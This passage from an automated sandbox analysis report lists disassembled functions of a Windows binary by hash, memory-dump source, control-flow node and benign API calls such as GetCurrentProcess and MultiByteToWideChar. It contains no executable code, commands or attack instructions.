                                                                                                                                      • Opcode Fuzzy Hash: 1cbb6f60dac4875b22b06bd79b5cc931ca51bc7b4c9fdc7a84ea3dac99900bfb
                                                                                                                                      • Instruction Fuzzy Hash: 49418871E016188FEB68CF5BC94479EFAF3AFC9304F04C1AAD50CA6254EB740A868F51
                                                                                                                                      Function 065D2947 Relevance: .1, Instructions: 112COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3689361519.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_65d0000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 77fd1a7446d91a1a8da893737c957c3269c3610819fd6815128c59978ea95805
                                                                                                                                      • Instruction ID: 1df4f98684a9a6aeac3264bf4bfae2f03ffffe0a2f81216fd1349cb09fc0ddca
                                                                                                                                      • Opcode Fuzzy Hash: 77fd1a7446d91a1a8da893737c957c3269c3610819fd6815128c59978ea95805
                                                                                                                                      • Instruction Fuzzy Hash: CC416771E016189BEB68CF5BC94479EFAF3AFC9300F14C1AAD50CA6254EB740A868F51
                                                                                                                                      Function 065D1B78 Relevance: .1, Instructions: 112COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3689361519.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_65d0000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: ca24ebcc84215814b51d1e8086d48eb0ea281253c27442cf70da2ac2f1055e8a
                                                                                                                                      • Instruction ID: bdb1bd6946825ecd9a87401d01c037002aab1bd5bdf994474b6867d9356de7df
                                                                                                                                      • Opcode Fuzzy Hash: ca24ebcc84215814b51d1e8086d48eb0ea281253c27442cf70da2ac2f1055e8a
                                                                                                                                      • Instruction Fuzzy Hash: 94416771E016189FEB68CF6BD94479EFAF3AFC9300F14C1AAC40CA6264DB7409868F51
                                                                                                                                      Function 061C1E8A Relevance: .1, Instructions: 112COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3687533440.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_61c0000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 700de664e29e6fc32d56402e3dce814766fb436ed3cf14acba5717b5445a87f1
                                                                                                                                      • Instruction ID: 7a2531248952a7d1cf34df811877865aaa9eed9c31070f61c29f5af64b8fe8c3
                                                                                                                                      • Opcode Fuzzy Hash: 700de664e29e6fc32d56402e3dce814766fb436ed3cf14acba5717b5445a87f1
                                                                                                                                      • Instruction Fuzzy Hash: 8A4166B1E016189BEB68CF6BC85479EFAF3AFC9200F14C1A9C40CA6254DB740A858F51
                                                                                                                                      Function 065D0DB2 Relevance: .1, Instructions: 110COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3689361519.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_65d0000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 1d4a89a2c5873586cc6c1edf096f08831faf5ef1b42a991e7b1f3c27b34ce0fe
                                                                                                                                      • Instruction ID: a12cdbf6db6c2b80daf9a65c908da1a900f2cd40a9bd99d34953eb4156ebbe9c
                                                                                                                                      • Opcode Fuzzy Hash: 1d4a89a2c5873586cc6c1edf096f08831faf5ef1b42a991e7b1f3c27b34ce0fe
                                                                                                                                      • Instruction Fuzzy Hash: 59415871E016189BEB68CF5BC94479EFAF3AFC9304F14C1AAC50CA6264EB740A858F55
                                                                                                                                      Function 063B940F Relevance: .1, Instructions: 109COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3687664779.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_63b0000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 6b9575ea8c32d48c8adc53858c5d0c6e0b0b4818b8d7afd4cbe3c9599dc381d6
                                                                                                                                      • Instruction ID: a6be7676ccf93aeb87eb0da4b5e7d680db2591d4c2a28381e4f2a095f5238309
                                                                                                                                      • Opcode Fuzzy Hash: 6b9575ea8c32d48c8adc53858c5d0c6e0b0b4818b8d7afd4cbe3c9599dc381d6
                                                                                                                                      • Instruction Fuzzy Hash: 9C41C274E012088BEB58DFAAD8547DDBBF6AF89300F14D02AC518AB298DB344946CF94
                                                                                                                                      Function 06426BA9 Relevance: .1, Instructions: 106COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3688121783.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6420000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 2b80acc5ceb52b039c8ab76702095af57faeae669458ce7d967e02535b87cc9f
                                                                                                                                      • Instruction ID: cdaf2ae3cf5958294e74c32cf5f896bc60d5bd5a51eff69697ffc0caffd30b08
                                                                                                                                      • Opcode Fuzzy Hash: 2b80acc5ceb52b039c8ab76702095af57faeae669458ce7d967e02535b87cc9f
                                                                                                                                      • Instruction Fuzzy Hash: ED410374E002188BEB58DFAAD85479EBBF2BF89300F60C06AD418BB354DB354946CF54
                                                                                                                                      Function 061C2572 Relevance: .1, Instructions: 104COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3687533440.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_61c0000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 3bc56f2f8b0d04253727280ea516021899163907d041aac25b7cf5f1e168da2d
                                                                                                                                      • Instruction ID: 07bdacec63d67d2ba9fe009eeb38a4c8cd834bbd9c59c0bd9af2c3648eb4a7d0
                                                                                                                                      • Opcode Fuzzy Hash: 3bc56f2f8b0d04253727280ea516021899163907d041aac25b7cf5f1e168da2d
                                                                                                                                      • Instruction Fuzzy Hash: EF41F1B4D00248CFDB58CFAAD5546EDFBF2AF88300F249029C454AB399EB354A06CF44
                                                                                                                                      Function 06452678 Relevance: .1, Instructions: 99COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3688801407.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6450000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 8ec404be3d202d1280b0667060f7edf612bb93c5e65824f23b44d496f3cf501d
                                                                                                                                      • Instruction ID: c1684ff7af2a13a647a395749f6b885d5acc48405d3c250e5d0545e5c174d5ec
                                                                                                                                      • Opcode Fuzzy Hash: 8ec404be3d202d1280b0667060f7edf612bb93c5e65824f23b44d496f3cf501d
                                                                                                                                      • Instruction Fuzzy Hash: 9941F574E002088BEB58DFAAD9547EEBBF2BF89304F10D06AC419BB255EB345946CF40
                                                                                                                                      Function 065D5BB6 Relevance: .1, Instructions: 87COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3689361519.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_65d0000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 1daac712a28cc342b75ea8e31028af797c6162274674bc51376ea78b7aa28a09
                                                                                                                                      • Instruction ID: 7446839737e0fe242e7c34255aeb99654e495f045f49b87c315cfca6e0892589
                                                                                                                                      • Opcode Fuzzy Hash: 1daac712a28cc342b75ea8e31028af797c6162274674bc51376ea78b7aa28a09
                                                                                                                                      • Instruction Fuzzy Hash: 6641F938E40329CFDB24EF20D954BAABBB2FB89304F1081E4940967354DB356E85DF41
                                                                                                                                      Function 02167C08 Relevance: 10.5, Strings: 8, Instructions: 488COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 683 2167c08-2167c10 684 2167b92-2167b98 683->684 685 2167c12-2167c14 683->685 688 2167ba3-2167bdf 684->688 689 2167b9a-2167ba0 684->689 686 2167c16-2167c3d 685->686 687 2167bf4-2167bfb 685->687 691 2167c43-2167c66 686->691 692 216806c-2168070 686->692 720 2167be1-2167bfb 688->720 721 2167bfc-2167c00 688->721 703 2167d14-2167d18 691->703 704 2167c6c-2167c79 691->704 693 2168072-2168086 692->693 694 2168089-2168097 692->694 701 2168108-216811d 694->701 702 2168099-21680ae 694->702 714 2168124-2168131 701->714 715 216811f-2168122 701->715 716 21680b5-21680c2 702->716 717 21680b0-21680b3 702->717 706 2167d60-2167d69 703->706 707 2167d1a-2167d28 703->707 722 2167c7b-2167c86 704->722 723 2167c88 704->723 710 216817f 706->710 711 2167d6f-2167d79 706->711 707->706 728 2167d2a-2167d45 707->728 729 2168184-21681b4 710->729 711->692 718 2167d7f-2167d88 711->718 724 2168133-216816e 714->724 715->724 725 21680c4-2168105 716->725 717->725 726 2167d97-2167da3 718->726 727 2167d8a-2167d8f 718->727 732 2167c8a-2167c8c 722->732 723->732 775 2168175-216817c 724->775 726->729 735 2167da9-2167daf 726->735 727->726 757 2167d47-2167d51 728->757 758 2167d53 728->758 759 21681b6-21681cc 729->759 760 21681cd-21681d4 729->760 732->703 738 2167c92-2167cf4 732->738 739 2168056-216805a 735->739 740 2167db5-2167dc5 735->740 787 2167cf6 738->787 788 2167cfa-2167d11 738->788 739->710 744 2168060-2168066 739->744 755 2167dc7-2167dd7 740->755 756 2167dd9-2167ddb 740->756 744->692 744->718 761 2167dde-2167de4 755->761 756->761 762 2167d55-2167d57 757->762 758->762 761->739 768 2167dea-2167df9 761->768 762->706 769 2167d59 762->769 771 2167ea7-2167ed2 call 2167a50 * 2 768->771 772 2167dff 768->772 769->706 789 2167fbc-2167fd6 771->789 790 2167ed8-2167edc 771->790 773 2167e02-2167e13 772->773 773->729 777 2167e19-2167e2b 773->777 777->729 780 2167e31-2167e49 777->780 843 2167e4b call 21685f0 780->843 844 2167e4b call 21685e0 780->844 783 2167e51-2167e61 783->739 786 2167e67-2167e6a 783->786 791 2167e74-2167e77 786->791 792 2167e6c-2167e72 786->792 787->788 788->703 789->692 816 2167fdc-2167fe0 789->816 790->739 793 2167ee2-2167ee6 790->793 791->710 794 2167e7d-2167e80 791->794 792->791 792->794 797 2167f0e-2167f14 793->797 798 2167ee8-2167ef5 793->798 799 2167e82-2167e86 794->799 800 2167e88-2167e8b 794->800 802 2167f16-2167f1a 797->802 803 2167f4f-2167f55 797->803 814 2167ef7-2167f02 798->814 815 2167f04 798->815 799->800 801 2167e91-2167e95 799->801 800->710 800->801 801->710 809 2167e9b-2167ea1 801->809 802->803 804 2167f1c-2167f25 802->804 806 2167f57-2167f5b 803->806 807 2167f61-2167f67 803->807 810 2167f27-2167f2c 804->810 811 2167f34-2167f4a 804->811 806->775 806->807 812 2167f73-2167f75 807->812 813 2167f69-2167f6d 807->813 809->771 809->773 810->811 811->739 819 2167f77-2167f80 812->819 820 2167faa-2167fac 812->820 813->739 813->812 821 2167f06-2167f08 814->821 815->821 817 2167fe2-2167fec call 21668f0 816->817 818 216801c-2168020 816->818 817->818 832 2167fee-2168003 817->832 818->775 824 2168026-216802a 818->824 827 2167f82-2167f87 819->827 828 2167f8f-2167fa5 819->828 820->739 822 2167fb2-2167fb9 820->822 821->739 821->797 824->775 829 2168030-216803d 824->829 827->828 828->739 834 216803f-216804a 829->834 835 216804c 829->835 832->818 840 2168005-216801a 832->840 837 216804e-2168050 834->837 835->837 837->739 837->775 840->692 840->818 843->783 844->783
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3680156839.0000000002160000.00000040.00000800.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_2160000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: (oq$(oq$(oq$(oq$(oq$(oq$,q$,q
                                                                                                                                      • API String ID: 0-2212926057
                                                                                                                                      • Opcode ID: bf66b2ba6c038f4b187036700c5d00ff7fd2466cf47ccb71fc961a1fdece08c9
                                                                                                                                      • Instruction ID: cabc3c781a97ad1fdf7d9145e5aff4cdd4244ec91aa97131173139e782703095
                                                                                                                                      • Opcode Fuzzy Hash: bf66b2ba6c038f4b187036700c5d00ff7fd2466cf47ccb71fc961a1fdece08c9
                                                                                                                                      • Instruction Fuzzy Hash: AB127E30A402089FCB24DF68D988AAEBBF2FF48318F158599E455DB3A1D731EC56CB50
                                                                                                                                      Function 004018F0 Relevance: 6.3, APIs: 5, Instructions: 77stringCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 1164 4018f0-4018fa 1165 401903-40193e lstrlenA call 4017e0 MultiByteToWideChar 1164->1165 1166 4018fc-401900 1164->1166 1169 401940-401949 GetLastError 1165->1169 1170 401996-40199a 1165->1170 1171 40194b-40198c MultiByteToWideChar call 4017e0 MultiByteToWideChar 1169->1171 1172 40198d-40198f 1169->1172 1171->1172 1172->1170 1174 401991 call 401030 1172->1174 1174->1170
                                                                                                                                      APIs
                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 00401906
                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
                                                                                                                                      • GetLastError.KERNEL32 ref: 00401940
                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3678323240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3678208117.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678437532.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678630985.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3322701435-0
                                                                                                                                      • Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                                      • Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
                                                                                                                                      • Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                                      • Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8
                                                                                                                                      Function 065DB5B8 Relevance: 6.1, APIs: 4, Instructions: 144threadCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 1177 65db5b8-65db5c0 1178 65db590-65db593 1177->1178 1179 65db5c2-65db657 GetCurrentProcess 1177->1179 1178->1177 1185 65db659-65db65f 1179->1185 1186 65db660-65db694 GetCurrentThread 1179->1186 1185->1186 1187 65db69d-65db6d1 GetCurrentProcess 1186->1187 1188 65db696-65db69c 1186->1188 1190 65db6da-65db6f2 1187->1190 1191 65db6d3-65db6d9 1187->1191 1188->1187 1202 65db6f5 call 65db798 1190->1202 1203 65db6f5 call 65db808 1190->1203 1191->1190 1193 65db6fb-65db72a GetCurrentThreadId 1195 65db72c-65db732 1193->1195 1196 65db733-65db795 1193->1196 1195->1196 1202->1193 1203->1193
                                                                                                                                      APIs
                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 065DB646
                                                                                                                                      • GetCurrentThread.KERNEL32 ref: 065DB683
                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 065DB6C0
                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 065DB719
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3689361519.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_65d0000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Current$ProcessThread
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2063062207-0
                                                                                                                                      • Opcode ID: 0f20a540d574506999cd62a4d4614691d3ac9898ca0ab8364f7c890c45139ec5
                                                                                                                                      • Instruction ID: 13c0688e8295b8c2d0bf73aa838d30d9962fc8dbfc5d46f3cbb6853f69eee9e8
                                                                                                                                      • Opcode Fuzzy Hash: 0f20a540d574506999cd62a4d4614691d3ac9898ca0ab8364f7c890c45139ec5
                                                                                                                                      • Instruction Fuzzy Hash: DC5178B4D003098FDB64DFAAD948BDEBBF6BF88304F248059E419A72A0D7345945CF66
                                                                                                                                      Function 065DB5C8 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 1204 65db5c8-65db657 GetCurrentProcess 1208 65db659-65db65f 1204->1208 1209 65db660-65db694 GetCurrentThread 1204->1209 1208->1209 1210 65db69d-65db6d1 GetCurrentProcess 1209->1210 1211 65db696-65db69c 1209->1211 1213 65db6da-65db6f2 1210->1213 1214 65db6d3-65db6d9 1210->1214 1211->1210 1225 65db6f5 call 65db798 1213->1225 1226 65db6f5 call 65db808 1213->1226 1214->1213 1216 65db6fb-65db72a GetCurrentThreadId 1218 65db72c-65db732 1216->1218 1219 65db733-65db795 1216->1219 1218->1219 1225->1216 1226->1216
                                                                                                                                      APIs
                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 065DB646
                                                                                                                                      • GetCurrentThread.KERNEL32 ref: 065DB683
                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 065DB6C0
                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 065DB719
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3689361519.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_65d0000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Current$ProcessThread
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2063062207-0
                                                                                                                                      • Opcode ID: 5b8396aa80d97c68273cc12b6dbd095878bcc774ffd3dadbec54ff291bfc1ac5
                                                                                                                                      • Instruction ID: 4a0c8ca259d29f07a6a8348534cf81f25bc3f8e2c82fb38106e9bac32859a57d
                                                                                                                                      • Opcode Fuzzy Hash: 5b8396aa80d97c68273cc12b6dbd095878bcc774ffd3dadbec54ff291bfc1ac5
                                                                                                                                      • Instruction Fuzzy Hash: 6E5147B0D003098FDB64DFAAD948BDEBBF6BF88314F248459E019A72A0D7345945CF69
                                                                                                                                      Function 0040AF66 Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 1227 40af66-40af6e 1228 40af7d-40af88 call 40b84d 1227->1228 1231 40af70-40af7b call 40d2e3 1228->1231 1232 40af8a-40af8b 1228->1232 1231->1228 1235 40af8c-40af98 1231->1235 1236 40afb3-40afca call 40af49 call 40cd39 1235->1236 1237 40af9a-40afb2 call 40aefc call 40d2bd 1235->1237 1237->1236
                                                                                                                                      APIs
                                                                                                                                      • _malloc.LIBCMT ref: 0040AF80
                                                                                                                                        • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                                                        • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                                        • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                                                      • std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
                                                                                                                                        • Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08
                                                                                                                                      • std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 0040AFC5
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3678323240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3678208117.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678437532.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678630985.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1411284514-0
                                                                                                                                      • Opcode ID: 2a036851afa6ddc1d7df3bddf1a8d8bff45cbcbf2885913663491285a515d732
                                                                                                                                      • Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
                                                                                                                                      • Opcode Fuzzy Hash: 2a036851afa6ddc1d7df3bddf1a8d8bff45cbcbf2885913663491285a515d732
                                                                                                                                      • Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E
                                                                                                                                      Function 0641F890 Relevance: 5.2, Strings: 4, Instructions: 181COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 1328 641f890-641f8be 1329 641f8c0 1328->1329 1330 641f8ca-641f8eb 1328->1330 1329->1330 1334 641f8f1-641f8f5 1330->1334 1335 641fada-641faff 1330->1335 1336 641f901-641f947 1334->1336 1337 641f8f7-641f8fb 1334->1337 1338 641fb06-641fb5e 1335->1338 1352 641f949-641f981 1336->1352 1353 641f988-641f99e 1336->1353 1337->1336 1337->1338 1352->1353 1356 641f9a0 1353->1356 1357 641f9a8-641f9c1 1353->1357 1356->1357 1360 641f9c3-641fa02 1357->1360 1361 641fa1f-641fa4d 1357->1361 1370 641facd-641fad7 1360->1370 1372 641fa08-641fa1a 1360->1372 1369 641fa52 1361->1369 1369->1370 1372->1370
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3687882365.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6410000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: (q$(q$xq$xq
                                                                                                                                      • API String ID: 0-4001314665
                                                                                                                                      • Opcode ID: 0720819f678f389f1731456b36ace3f25fa0bc3caa5b7074a81396e279333f7b
                                                                                                                                      • Instruction ID: 550b0669124bc1da01965e91c559b308ccb905b967474375791351b5f89df68e
                                                                                                                                      • Opcode Fuzzy Hash: 0720819f678f389f1731456b36ace3f25fa0bc3caa5b7074a81396e279333f7b
                                                                                                                                      • Instruction Fuzzy Hash: 1E619D317002049FDB599F24C854BAEBBA2AFC4310F14846DE81A9F3A5DB36EC47CB91
                                                                                                                                      Function 021695AF Relevance: 4.2, Strings: 3, Instructions: 484COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
